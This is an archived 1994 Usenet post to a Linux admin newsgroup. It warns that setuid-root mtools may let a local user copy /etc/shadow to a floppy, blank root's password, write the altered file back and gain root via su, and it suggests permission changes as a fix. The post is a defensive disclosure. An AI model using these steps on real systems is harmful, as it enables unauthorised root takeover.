Setup dependant probable security hole

Setup dependant probable security hole

Post by Disaster prone simplet » Sat, 16 Apr 1994 02:56:26

Newsgroups: comp.os.linux.admin
Subject: Possible security hole (software version/setup dependant)
Distribution: world
Organization: Oxford University Undergraduate Engineering & Comp Sci Lab, UK

The following security may or may not be present on your system.
If you have your mtools setuid root the following could well be possible
if you have a mess-dos disc in the floppy drive...
cracker% mwrite /etc/shadow A:
cracker% mread A:shadow hehe
cracker% <upload and edit hehe so root has no password>
cracker% <upload diddled /etc/shadow>
cracker% mwrite diddled A:
cracker% mread diddled /etc/shadow
cracker% su root

If this security hole is present on your system try:
chgrp fdisc /dev/fd*
chmod 660 /dev/fd*
chgrp fdisc /usr/bin/<mtools>
chmod g+s a-s /usr/bin/<mtools>

(The presence or absence of this hole is obviously dependant on what version
of the mtools you use and how it is set up).

Duncan (-:
"I'll try it on my system sometime soon... it was just a cute idea I had"

P.S. if you have / as a dos disc and the emulator setuid root make sure that
      crackers can't use the dos emulator to give you an alternative version
       of things you don't want them to (e.g. /etc/shadow).